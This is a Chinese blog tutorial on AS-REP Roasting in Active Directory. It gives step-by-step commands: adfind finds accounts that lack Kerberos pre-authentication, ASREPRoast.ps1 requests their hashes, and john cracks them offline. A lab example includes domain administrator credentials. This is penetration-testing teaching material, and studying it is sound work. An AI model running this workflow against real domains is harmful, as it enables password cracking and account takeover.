当前位置: 首页 > article >正文

AS-REP Roasting离线爆破攻击

针对一个域内用户,其账户选项有个设置叫作 “不要求 kerberos 预身份验证”,它默认是关闭的。

当 “不要求 kerberos 预身份验证” 选项被勾选,会出现以下效果:

  • as-req 报文中不需要添加用户 hash 加密的时间戳,自动返回 as-rep 报文。

  • 如果用户能使用用户 hash 解密 as-rep 报文中的 Logon Session Key ,那么代表用户凭据正确。

as-req Roasting攻击的原理就是当我们收到 as-rep 报文后,我们使用密码字典生成多个 hash 来解密 Logon Session Key ,如果成功则爆破出密码。

查询 “不要求 kerberos 预身份验证” 的域用户

工具:adfind

在域外:
adfind -h [dc_ip:dc_port] -u [domain_name\user_name] -up [password] -f "useraccountcontrol:1.2.840.113556.1.4.803:=4194304" -dn
​
[dc_ip:dc_port]:表示域控ip和端口号
[username\domain_name]:表示用户及所在的域
[password]:表示用户的密码
-f:过滤条件为useraccountcontrol:1.2.840.113556.1.4.803:=4194304
-dn:表示显示结果属性为dn
AdFind -h 192.168.72.163:389 -u hacker.com\administrator -up p-0p-0p-0p -f "useraccountcontrol:1.2.840.113556.1.4.803:=4194304" -dn

向 “不要求 kerberos 预身份验证” 的域用户发起 as-req 请求

工具:ASREPRoast.ps1,项目地址:ASREPRoast/ASREPRoast.ps1 at master · HarmJ0y/ASREPRoast · GitHub

Import-Module .\ASREPRoast.ps1 
Get-ASREPHash -UserName [username] -Domain [domain_name] -Server [dc_ip] | Out-File -Encoding ASCII hash.txt
Import-Module .\ASREPRoast.ps1 
Get-ASREPHash -UserName administrator -Domain hacker.com -Server 192.168.72.163 | Out-File -Encoding ASCII hash.txt

离线爆破

工具:john

john --wordlist=[passwords_file] hash.txt
john --wordlist=/tmp/password.txt /tmp/hash.txt

 


http://www.kler.cn/a/447345.html

相关文章:

  • 0.gitlab ubuntu20.04 部署问题解决
  • ElasticSearch08-分析器详解
  • HarmonyOS(72)事件拦截处理详解
  • 「Mac畅玩鸿蒙与硬件46」UI互动应用篇23 - 自定义天气预报组件
  • 多个Echart遍历生成 / 词图云
  • 后端使用Spring Boot框架 + 前端VUE 实现滑动模块验证码
  • 探索AI安全治理,打造大模型时代的可信AI
  • 雅思真题短语梳理(五)
  • Facebook的隐私保护政策:用户数据如何在平台上被管理?
  • WSL切换默认发行版
  • 启动打印服务提示:Http端口已被使用,请修改
  • 全脐点曲面当且仅当平面或者球面的一部分
  • android recycleview 中倒计时数据错乱
  • puppet 配置 6 变量的特殊用法
  • python--在服务器上面创建conda环境
  • 多线程设计模式-保护性暂停之面向对象
  • django中cookie与session的使用
  • 【背景信息】Proxmox Virtual Environment 创建AD域实现统一身份认证(一)
  • Android 搭建AIDL Client和Server端,双向通信
  • OpenCV实现实时人脸检测和识别
  • Python 图像处理领域的十一个基础操作
  • 聚观早报 | 百度回应进军短剧;iPad Air将升级OLED
  • 7-2 排序
  • Android音频中常用的BT Format和Profile介绍
  • Excel智能公式,根据日期一键生成唯一订单编号
  • 【python因果库实战9】TMLE - 目标最大似然估计2